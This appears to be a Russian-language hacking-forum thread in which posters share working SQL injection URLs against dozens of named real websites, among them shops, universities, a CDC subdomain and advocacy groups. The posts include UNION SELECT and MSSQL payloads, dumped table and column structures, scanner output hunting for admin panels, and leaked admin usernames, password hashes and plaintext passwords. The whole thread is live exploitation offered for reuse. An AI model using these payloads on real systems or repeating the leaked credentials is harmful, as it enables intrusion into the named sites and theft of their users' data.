вот так тож можно http://www.horsens-emballage.dk/products.php?id=121+union+select%201,password,3,4,5+from+users ------------------------------------------------------------------ admin:6acb8c143d32f46326b37aa2fff1bced
сайт посвящённый программированию: знаменитый ИСХОДНИКИ.РУ admin:d2811372903d0e598162e5762cd18340db68d846 -> flash15 а вот админку так и не нашёл =(
в антибояне нет www.kulturflooring.com Уязвимость в скрипте: Code: http://www.kulturflooring.com/index.php?id=1' Подбор колонок: Code: http://www.kulturflooring.com/index.php?id=-1+union+select+1,2,3,4/* Информация о базе: Code: 4.0.26 kulturflooring_com [email protected]
http://o-sport.ru/ 5.0.30-Debian_1-log Вытащил все че мог я) admin:508504343ef23ff48724729cd07281e7 =>290486 Если база с хэшей не врет. Админку не нашел если кто найдет Дайте знать где она.
http://www.protopor.gr/index.php?shownews=-1/**/union/**/select/**/0,1,2,3,4,5,concat(uid,char(20),username,char(20),password),7,8,version(),10,user(),12,13,14,15,16,17+from+users/*
http://www.party-san.de/openair/festival/index.php?shownews=-1'/**/union/**/select/**/0,concat(id,char(20),username,char(20),pwd,ch ar(20),email),2,concat(version(),char(20),database(),char(20),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+pnew s_pfuser/*&lang=de
sql mssql http://www.gastromag.ru/newsgastro/view_archive.asp?r=6&id=-1'+or+1=@@version%20-- Вытащил имена таблиц, и уже столбцы. ('column') Буду осматривать все((( так как бональнова ,user,password нету( Име базы текущего usera: 'GSnews' Может админка не в этой базе? А может что login и pass вобще не хранится в mssql, или нету прав на просмотр имени этой таблице?
Code: http://spa.american.edu/ccps/pages.php?ID=-20+union+select+1,2,3/* Code: http://www2a.cdc.gov/phlp/dailynews/default.asp?specific=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('PHLP_tblBibPub','PHLP_tblBib','CoopAgree_Projects','EPRP_PRGrants','EPRP_TBLGLOBAL','invTBLCDOrder','EPRP_TBLLOGINS','invTBLCONTACT','Campus','CoopAgree_Award','CoopAgree_ContactProject','CoopAgree_ContactReviewerPanel','CoopAgree_Contacts','CoopAgree_ContactSAE','CoopAgree_Institution','CoopAgree_InstitutionOLD','CoopAgree_PanelContact','CoopAgree_Pep','CoopAgree_PepContact','CoopAgree_ProjectSAE','CoopAgree_PrtControl','CoopAgree_PrtControlParms','CoopAgree_ReviewerPanel','CoopAgree_ReviewerPanel','CoopAgree_Role','CoopAgree_SAE','CoopAgree_Security','DPHSDRTask_Clearance','DPHSDRTask_Divisions','DPHSDRTask_Meeting','DPHSDRTask_POC','DPHSDRTask_Projects','DPHSDRTask_ProjectStatus','DPHSDRTask_ProjectTypes','dtproperties','eprpTBLCONTACT','HelpDeskAdmins','ITSO_VC_SURVEY','JohnNews','LPHPRCI_UserListing','LU_Branch','LU_Division','LU_EmailGroup','LU_Request','MGMT_Developers','MGMT_Divisions','MGMT_Projects','MGMT_ProjectStatus','MGMT_ProjectTypes','OD_TBLLOGINS','ODTASK_Clearance','ODTask_Divisions','ODTASK_Meeting','ODTask_POC'))-- Code: http://pr.utk.edu/news/article.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('HS_TRANSACTION_LOG','dtproperties','RELEASE_UTC','releaseTBL','sysconstraints','syssegments','tntnews','vw_Release','vwDROP','vwDROP2','vwEXPIRE','vwEXPIREDATE','vwTODAY','vwUTM','vwVET','vwWeek'))-- Code: http://idl63.ils.unc.edu/chirag/Energy/showmetadata.php?video_id=-8949+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+42,1/* Code: http://www.fwbusinesspress.com/display.php?id=-6716+union+select+1+from+admin/* Code: http://www.graysofwestminster.co.uk/newsitem.php?id=-35+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6/* Code: http://www.stjerome.co.uk/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*&doctype=Periodicals§ion=1 Code: http://www.pluralism.org/news/article.php?id=-2557+union+select+1,user(),3,4,5,6,7,8,9,10,version(),database(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/* Code: http://www.dysgenicrecords.com/release.php?id=-19+union+select+1,2,3,4,5,6,7,8,9,10,11/* Code: http://www.coopersurgical.com/csweb/product_100.asp?category_id=1%20or%201=(SELECT+TOP+1+last_name+FROM+csweb_user)-- имеется колонки: 'user_id','customer_number','unvalidated_customer_number','date_created','first_name','middle_initial','last_name','title','telephone_number','fax_number','email_address','password','marketing_info_id','email_reminder Code: http://www.peakdistrictonline.co.uk/content.php?categoryId=1804+order+by+100/* Code: http://www.tartybikes.co.uk/product.php?id=-10008+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,table_name,20,21+from+information_schema.tables+limit+47,1/* Code: http://www.magic-pony.com/product.php?id=-2384+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*&category=western Code: http://www.toddlepembrokeshire.com/toddle-category.asp?id=1%20or%201=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)%2B%27%3A%27%2Bcast(email+as+nvarchar)+from+Customersreal+where+CustomerID=150)-- Code: http://www.toddlepembrokeshire.com/toddle-category.asp?id=1%20or%201=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as++nvarchar)+from+users)-- carl:wrex Code: http://www.toddlepembrokeshire.com/toddle-category.asp?id=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('hayleybookings','CancelShop2008a','hayleycharges','beachinfotest','ModCottages2009','ModCottages2008new','ModCottages2008a','cartitem','BookingNew2001','ModCottages','ModBooking2009','coastal_offers','Clusters','ModBooking2008new','ClusterCottages','monthof','BookingNew2006a','ClientCare2009','OwnerNew','BookingNew2007','ModBooking2008a','OwnerNew2001','BookingNew2007old','users','ClientCare2008a','OwnerNew2002','BookingNew2008','CancelBooking2008a','ClientCare2007','OwnerNew2003','BookingNew2008a','clent_care','OwnerNew2004','ModBooking2007','OwnerNew2005','BookingNew2009','sin','location','OwnerNew2006','CCPHomePage','CottageMaint2009','CottageMaint2008a','CottageMaint2007','OwnerNew2007old','CancelBooking2009','Customersreal','emailreport','guestbook','emailcontent','CottagesNew2008new','ecards','dogs','D99_Tmp','OwnerNew2009','Caretaker2007','picofmonth','Caretaker2007a','customers','PricesNew2007','Caretaker2007b','PricesNew2008a','LateDeals','Caretaker2008','Caretaker2008a','PricesNew2009','Caretaker2008b','CancelBooking2008new','Pricing2000','Caretaker2009','Pricing2001','Caretaker2009a','Pricing2002','Caretaker2009b','pricing2003','pricing2004','celebrations','pricing2005','Charges','pricing2006','Charges2001','pricing2006a'))--&category=9 Code: http://www.magicbeard.com/view.php?id=-35'+union+select+1,2,3,4,5,6,7,8,9/* Code: http://www.cz-usa.com/product_detail.php?id=-74+union+select+1,2,3,4,5,6/* Code: http://www.solarstyleinc.com/detail.php?ID=-64+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/* Code: http://edgartownboardoftrade.com/php/events2.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* Code: http://www.menupix.com/boulder/restaurants.php?id=-700105+union+select+1,2,3/* Code: http://www.airsideshop.com/product.php?id=-298+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,14,14,14,14,14,14/* Code: http://www.pharmaexpress.us/resource/products/orderInfoForm.asp?ID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('TABLE_PRIVILEGES','TABLES','SCHEMATA','OrderSearchedWords','KNUEPPELS_Reorder','surfmedproducts','OrderProductsCOPY','Careers','Sheet1$','OrderCustomers','tblPolls','ArticleTypes','tblConfiguration','lifeplus','lifplusCLEAN','MotionWhatsNew','MotionNews','MotionLogin','OrderInsuranceApp','MalEmails','OrderMfgs','OrderProducts','Audit','ArticleCategories','StateNames','OrderReceipts','ArticleUploads','OrderOwnerProducts','OrderLIreorder','Deliveries','OrderCategory','OrderBasket','OrderOwners','AppointmentRegistration','Aronson_Referral_Form','Articles','PollTakers','Polls','PollQuestions','REFERENTIAL_CONSTRAINTS','CHECK_CONSTRAINTS','UnityHME_news','CONSTRAINT_TABLE_USAGE','CONSTRAINT_COLUMN_USAGE','VIEWS','AEROFLOW_Forms','OrderProductsNEW','VIEW_TABLE_USAGE','VIEW_COLUMN_USAGE','GalleryTopics','ResFormLineItems','GalleryPhotos','syssegments','sysconstraints','sysalternates','ValidUsers','KEY_COLUMN_USAGE','ResFormCustomers','TankMasterTanks','TankEvacuation','OrderSubmitToLoc','dtproperties','TankAnalyzerCheck','!SiteOwners','TankAudit','TankLocation','TreeList_Tmp','TankValidUsers','OrderInfoRequests','TankDetails','ResFormProducts','TABLE_CONSTRAINTS','COLUMNS','COLUMN_DOMAIN_USAGE','LINCOLN_ReferralForm','COLUMN_PRIVILEGES','DOMAINS','DOMAIN_CONSTRAINTS','UnityHME_news_categories'))-- Code: http://dma.ucla.edu/gallery/faculty_gallery.php?ID=-101+union+select+1,2,3,4,5,6,7,8,9,10,11,12/* Code: http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
Статьи для кого пишут? http://www.inattack.ru/article/275.html http://www.inattack.ru/article/163.html .. поиск по форуму находится слева
erostory.ru Порнуха в текстовом виде xD. Интересные запросы к интересным таблицам: Логиниться с этими данными в http://www.erostory.ru/autor.php . Как попасть в админку: хз. Просканил CGI-сканером Pelmeshko: Code: --------------------------------------------- [i] Starting scan. [i] Start time: Sat Jun 7 19:49:05 2008 [i] Targer host/path: erostory.ru/ [i] Targer port/SSL: 80 | 0 --------------------------------------------- [*] 404 Probe request to server. Server answering with HTTP/1.1 404 Not Found [*] Server Headers: [*] Server: Apache/2 [*] Database Cgi's: [*] Rootdir found: erostory.ru/cgi-bin/ [*] Database Common: [*] Rootdir found: erostory.ru/ [*] [403] Found: erostory.ru/admin/ [*] [403] Found: erostory.ru/administration/ [*] [403] Found: erostory.ru/admins/ [*] [403] Found: erostory.ru/cgi-bin/ [*] [302] Found: erostory.ru/config/ [*] [403] Found: erostory.ru/error/ [*] [403] Found: erostory.ru/images/ [*] [403] Found: erostory.ru/img/ [*] [403] Found: erostory.ru/picture/ [*] [200] Found: erostory.ru/robots.txt [*] [403] Found: erostory.ru/.htaccess [*] [403] Found: erostory.ru/.htpasswd [*] [403] Found: erostory.ru/.htaccess~ [*] [403] Found: erostory.ru/.htpasswd~ [*] [403] Found: erostory.ru/admin-a/ [*] [403] Found: erostory.ru/server-status/ --------------------------------------------- [*] Scan finished at Sat Jun 7 19:53:28 2008. Total 817 objects scanned --------------------------------------------- Куча админок, но все 403 Forbidden. Может админа по IP-адресу определяют, я хз...
http://www.flirtanica.ru/articles1.php?id=-1+union+select+1,version(),3,4,user()/* version() 4.1.22 user() flirtani@localhost не стал подбирать колонки, не люблю 4-ую версию за это :-( ---------------------------------- http://www.webapplist.com/category.php?id=-1'+union+select+1,2,3,4/* а здесь не смог подобрать кол-во колонок, дошел до 100 но все равно: The used SELECT statements have a different number of columns посмотрите если кому интересно...
http://www.ittconference.ie Code: http://www.ittconference.ie/main.php?ID=-1+union+select+1,concat_ws(0x3a,username,password,email),3,4,5,6,7+from+itt_reviewer+limit+0,1/* http://www.curacaodolphintherapy.com/ Code: http://www.curacaodolphintherapy.com/main.php?id=-1+union+select+1,2,concat_ws(0x3a,id,username,password,admin),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+limit+0,1/*
http://www.eicta.org/index.php?id=32&id_article=93' http://www.paintball.ru/next.php?id=999919+union+select+1,2,VERSION() http://www.comingsoon.net/films.php?id=1+union+select+VERSION() http://www.fcdynamo.ru/players.php?id=-1'+union+select+table_name+from+information_schema.tables+limit+59,1/* http://expressorder.ru/forum/message.php?id=11' http://www.hpol.org/record.php?id=72 http://www.mymaika.ru/catalog.php?id=181' http://www.fm.gov.lv/index.php?id=8' http://www.mtas.ru/second.php?ID=-243+union+select+1/* http://opel.avto-city.ru/catalog.php?id=-3+union+select+1,2,3,4,5,6,7/* http://koleso.topof.ru/testing_info.php?id=-9+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name='admins'+limit+1,1/* http://koleso.topof.ru/testing_info.php?id=-9+union+select+1,2,concat(admin_name,0x3a,admin_password),4,5,6,7+from+admins+limit+5,1/* http://www.flirtanica.ru/articles1.php?id=-33+union+select+1,2,3,4,VERSION()/* http://www.rudtp.ru/articles.php?id=44+union+select+1,2,3,4,5,6,7/* http://www.acte.org/resources/press_release.php?id=-284+union+select+1,2,3,4,5,6,7,8,9/* http://www.analisi.ru/regulations.php?id=-3+union+select+1,2,3,4/* http://ansijournals.com/3/c4p.php?id=1'&theme=3&jid=itj http://www.bmoca.org/artist.php?id=-74+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* http://www.chinesejetpilot.com/index.php?ID=-202+union+select+1,2,3,4,5,6/* http://www.avtosreda.ru/new/meropr.php?id=-16+union+select+1/* http://zoorinok.com.ua/razdel/&podrazdel=-306+union+select+1,VERSION(),3,4,5,6/* =============================================================== lastsmile,я твою первую скулю давненько нашел,но ты оказался тут первым=)
www.glaad.org Уязвимость: Code: http://www.glaad.org/media/resource_kit_detail.php?id=3457' Колонки: Code: http://www.glaad.org/media/resource_kit_detail.php?id=-3457+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 Информация о базе: Code: glaad_www_1 4.0.12-standard glaad@localhost
www.suter.ru Сайт российских сутенеров VERSION() - 5.1.11-beta USER() - xstars_u@localhost DATABASE() - db_xstars_u Структура таблиц Code: ************************** agent -------------------------- name cvet ************************** attak -------------------------- ip k-vo interval adres site otprmail ************************** buf -------------------------- ip vrem adres site ************************** clicks -------------------------- ip banner_id time referer ************************** club -------------------------- name name_en opisanie opisanie_en photo link data block ************************** sessions -------------------------- uid expire ip ************************** sites -------------------------- site log posl poslstr id name ************************** users -------------------------- name email transfer phone site password ************************** devk -------------------------- new name name_en prioritet rate id_goroscop razmer rost ves grud vozrast id_gorod id_metro adres mail club text text_en hour_app hour2_app night_app hour_out hour2_out night_out sutki valut photosmall time_block data block prosmotr penis kto chya blockind ************************** dnevniky -------------------------- nazv smtext text links date ************************** foto -------------------------- id_devk foto ************************** gorod -------------------------- name name_en ************************** goroscop -------------------------- name name_en ************************** message -------------------------- r_id name subject msg email m_date ip ************************** message1 -------------------------- id_devk nick mess data ************************** message_en -------------------------- r_id name subject msg email m_date ip ************************** metro -------------------------- name name_en ************************** param -------------------------- mned ened kned pned transned ************************** podrugy -------------------------- podruga_id ************************** poll_alternatives -------------------------- alternative votes id ************************** polls -------------------------- question active dateactive votes ************************** polz -------------------------- login pass mail balance ************************** site_news -------------------------- nazv text date ************************** soedcp -------------------------- id_club ************************** soeddp -------------------------- id_devk ************************** suter_cras -------------------------- name block ************************** suter_crast -------------------------- id_cras nazv text date ************************** suter_lgesotr -------------------------- block name text foto1 foto2 foto3 gorod ip datetime ************************** suter_nazam -------------------------- name block ************************** suter_nazamt -------------------------- id_nazam nazv text date ************************** suter_psevdoklienty -------------------------- name ip mail telephone telephone2 mbtelephone mb2telephone name_ps adres avto soobsh date ************************** suter_rassilk -------------------------- mail ip date ************************** suter_urb -------------------------- name block ************************** suter_urbt -------------------------- id_urb nazv text date ************************** svaz_uslug -------------------------- id_usl ************************** telephone -------------------------- id_club operator ************************** telephoneind -------------------------- tel operator ************************** uslugy -------------------------- name name_en kto ************************** video -------------------------- id_devk namev data ************************** x_news -------------------------- nazv nazv_en smtext smtext_en text text_en img date **************************
